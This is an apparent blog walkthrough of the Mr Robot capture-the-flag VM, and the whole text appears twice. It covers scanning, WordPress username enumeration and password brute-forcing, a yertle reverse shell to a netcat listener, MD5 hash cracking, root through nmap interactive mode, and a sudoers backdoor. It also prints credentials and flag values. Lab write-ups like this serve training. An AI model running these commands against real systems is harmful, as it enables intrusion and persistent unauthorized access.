MrRobot - Walkthrough Notes. - Challenge to find 3 Keys notes
Currently scanning: Finished! | Screen View: Unique Hosts
13 Captured ARP Req/Rep packets, from 8 hosts. Total size: 676
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.0.18 08:00:27:fa:aa:aa 1 60 PCS Systemtechnik GmbH
We know the IP is 192.168.0.10
Now a top 1000 ports port scan...
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
443/tcp open https
Open up the Webpage and run Dirb against the site.
**Robots.txt**
fsocity.dic
key-1-of-3.txt
So now we can curl out the first key
--curl http://192.168.0.18/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
Next the output of the dirb shows us a login page for a Wordpress Site...
wp-admin/login.php
Now the first task is to work out the username.
We use the user list we found in the robots.txt file and use the burp repeater against the username field.
Now we view the reponses and find a username that says the password is wrong.
This way it gives away that the user "elliot" exists.
Now we use WPwner with the username of elliot and run it against the wordlist as the passwords with 40 threads..
Ok so lets look at the fsociety file.
If we do a word count we see there are a lot of inputs including a lot of duplicates.
lets remover the duplicates to lower the file size down and direct the output to a new file..
awk '!seen[$0]++' fsocity.dic > unique.txt
Now we run this against the Wpwner and we find the admin password
python wpforce.py -i uset.txt -w ~/123/uniques.txt -u "http://192.168.0.18/" -t 40 -v
Trying elliot : Interesting
--------------------------
[elliot : ER28-0652] are valid credentials! - THIS ACCOUNT IS ADMIN
--------------------------
100% Percent Complete
All correct pairs:
{'elliot': 'ER28-0652'}
Now we know the username and password we can use Yertle to create a reverse shell.
lets setup a nc listener to catch the yertle shell.
-- nc -l -v -p 80
-- python yertle.py -t http://192.168.0.18 -u elliot -p ER28-0652 -v -li 192.168.0.100 -lp 80 -r
B00m we are in!
####################################Priv Escalation#################################################
Looking in the home directory we find the user account 'robot'
We find two files, the flag file only readable by the user 'robot' and a file that looks to have the password
in encoded in md5 format.
daemon@linux:/home/robot$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
As this is an MD5 its not directly decodeable like base64.
Therefore we can trya n online md5 compare and hope it has been found in the past.
Our luck is in and the password is
abcdefghijklmnopqrstuvwxyz
***NOTE***(if it were base64 we would do)
echo QWxhZGRpbjpvcGVuIHNlc2FtZQ== | base64 --decode
So now we know the password for the user account 'robot'
so lets move into this user..
su robot
password: abcdefghijklmnopqrstuvwxyz
and now we have the user robot's prompt
robot:$
Now we have found the second Key - 822c73956184f694993bede3eb39f959
search for permission owned by root but executed by anyone
find / -user root -perm -4000 -exec ls -ldb {} \;
We find that nmap is installed. We know that early versions of nmap run in interactive mode that runs as root.
This also allows systems commands to be run, and they are therefore executed as root :-)
Now we move into interactive mode that gives us a root shell
!sh
and here we go :-)
Next we can add the user robot to the sudoers file with:
echo "robot ALL=(ALL) ALL" >> /etc/sudoers
now we look ino the /rot an dfind the 3rd key
04787ddef27c3dee1ee161b21670b4e4
Machine r00ted :-)
Currently scanning: Finished! | Screen View: Unique Hosts
13 Captured ARP Req/Rep packets, from 8 hosts. Total size: 676
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.0.18 08:00:27:fa:aa:aa 1 60 PCS Systemtechnik GmbH
We know the IP is 192.168.0.10
Now a top 1000 ports port scan...
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
443/tcp open https
Open up the Webpage and run Dirb against the site.
**Robots.txt**
fsocity.dic
key-1-of-3.txt
So now we can curl out the first key
--curl http://192.168.0.18/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
Next the output of the dirb shows us a login page for a Wordpress Site...
wp-admin/login.php
Now the first task is to work out the username.
We use the user list we found in the robots.txt file and use the burp repeater against the username field.
Now we view the reponses and find a username that says the password is wrong.
This way it gives away that the user "elliot" exists.
Now we use WPwner with the username of elliot and run it against the wordlist as the passwords with 40 threads..
Ok so lets look at the fsociety file.
If we do a word count we see there are a lot of inputs including a lot of duplicates.
lets remover the duplicates to lower the file size down and direct the output to a new file..
awk '!seen[$0]++' fsocity.dic > unique.txt
Now we run this against the Wpwner and we find the admin password
python wpforce.py -i uset.txt -w ~/123/uniques.txt -u "http://192.168.0.18/" -t 40 -v
Trying elliot : Interesting
--------------------------
[elliot : ER28-0652] are valid credentials! - THIS ACCOUNT IS ADMIN
--------------------------
100% Percent Complete
All correct pairs:
{'elliot': 'ER28-0652'}
Now we know the username and password we can use Yertle to create a reverse shell.
lets setup a nc listener to catch the yertle shell.
-- nc -l -v -p 80
-- python yertle.py -t http://192.168.0.18 -u elliot -p ER28-0652 -v -li 192.168.0.100 -lp 80 -r
B00m we are in!
####################################Priv Escalation#################################################
Looking in the home directory we find the user account 'robot'
We find two files, the flag file only readable by the user 'robot' and a file that looks to have the password
in encoded in md5 format.
daemon@linux:/home/robot$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
As this is an MD5 its not directly decodeable like base64.
Therefore we can trya n online md5 compare and hope it has been found in the past.
Our luck is in and the password is
abcdefghijklmnopqrstuvwxyz
***NOTE***(if it were base64 we would do)
echo QWxhZGRpbjpvcGVuIHNlc2FtZQ== | base64 --decode
So now we know the password for the user account 'robot'
so lets move into this user..
su robot
password: abcdefghijklmnopqrstuvwxyz
and now we have the user robot's prompt
robot:$
Now we have found the second Key - 822c73956184f694993bede3eb39f959
search for permission owned by root but executed by anyone
find / -user root -perm -4000 -exec ls -ldb {} \;
We find that nmap is installed. We know that early versions of nmap run in interactive mode that runs as root.
This also allows systems commands to be run, and they are therefore executed as root :-)
Now we move into interactive mode that gives us a root shell
!sh
and here we go :-)
Next we can add the user robot to the sudoers file with:
echo "robot ALL=(ALL) ALL" >> /etc/sudoers
now we look ino the /rot an dfind the 3rd key
04787ddef27c3dee1ee161b21670b4e4
Machine r00ted :-)
No comments:
Post a Comment